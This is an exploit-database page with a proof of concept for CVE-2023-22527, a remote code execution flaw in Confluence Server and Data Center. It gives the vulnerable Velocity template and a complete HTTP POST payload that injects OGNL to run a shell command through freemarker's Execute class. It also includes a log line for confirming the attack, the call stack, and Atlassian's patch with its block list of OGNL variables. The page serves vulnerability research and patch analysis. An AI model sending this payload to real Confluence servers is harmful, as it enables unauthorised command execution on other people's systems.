Share
## https://sploitus.com/exploit?id=AE18966E-79A6-5997-A217-92FBFDAB6B31
# CVE-2023-22527 Confluence RCE
CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC
## References
[CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server | Atlassian Support | Atlassian Documentation](https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html?subid=1812250057&jobid=106379017&utm_campaign=confluence-critical-advisory_EML-17850&utm_medium=email&utm_source=alert-email)
[CONFSERVER-93833\] RCE (Remote Code Execution) in Confluence Data Center and Server - CVE-2023-22527 - Create and track feature requests for Atlassian products.](https://jira.atlassian.com/browse/CONFSERVER-93833)
https://twitter.com/TheDFIRReport/status/1749066611678466205
[Atlassian Confluence - Remote Code Execution (CVE-2023-22527) (projectdiscovery.io)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/)
[Bypassing OGNL sandboxes for fun and charities - The GitHub Blog](https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/)
## Docker Env
```bash
docker compose up -d
```
## Debug
You can debug on port 5008
## Diff
![image-20240117093518010](https://laughing-markdown-pics.oss-cn-shenzhen.aliyuncs.com/image-20240117093518010.png)
## Vulnerability location
./confluence/confluence/template/aui/text-inline.vm
```txt
#set( $labelValue = $stack.findValue("getText('$parameters.label')") )
#if( !$labelValue )
#set( $labelValue = $parameters.label )
#end
#if (!$parameters.id)
#set( $parameters.id = $parameters.name)
#end
<label id="${parameters.id}-label" for="$parameters.id">
$!labelValue
#if($parameters.required)
<span class="aui-icon icon-required"></span>
<span class="content">$parameters.required</span>
#end
</label>
#parse("/template/aui/text-include.vm")
```
## PoC
``` txt
POST /template/aui/text-inline.vm HTTP/1.1
Host: 192.168.31.3:8092
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 287
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
```
## Self-check
in confluence/logs/confluence_access.2024-xx-xx.log
```txt
192.168.11.1 - [23/Jan/2024:06:04:42 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 200 28906 677 /template/aui/text-inline.vm http-nio-8090-exec-7 "-"
```
## Stack
`org.apache.struts2.views.velocity.StrutsVelocityContext#internalGet`
โ
`org.apache.struts2.views.jsp.ui.OgnlTool#findValue`
โ
`freemarker.template.utility.Execute `
โ
`java.lang.Runtime#exec(java.lang.String)`
## Keyword
Velocity,SSTI Injection
## Patch
``` java
package com.atlassian.confluence.impl.struts;
import java.util.Set;
import ognl.Node;
import org.apache.struts2.ognl.StrutsOgnlGuard;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class ConfluenceOgnlGuard extends StrutsOgnlGuard {
private static final Logger LOG = LoggerFactory.getLogger(ConfluenceOgnlGuard.class);
private static final Set<String> BLOCKED_VAR_REFS = Set.of("#context", "#request", "#parameters", "#session", "#application", "#attr");
public ConfluenceOgnlGuard() {
}
protected boolean skipTreeCheck(Node tree) {
return false;
}
protected boolean checkNode(Node node) {
return super.checkNode(node) || this.isBlockedVarRef(node);
}
protected boolean isBlockedVarRef(Node node) {
String nodeClassName = node.getClass().getName();
if ("ognl.ASTVarRef".equals(nodeClassName)) {
String varRefValue = node.toString();
if (BLOCKED_VAR_REFS.contains(varRefValue)) {
if (!"#attr".equals(varRefValue)) {
LOG.warn("Expression contains blocked var ref [{}]", varRefValue);
}
return true;
}
}
return false;
}
}
```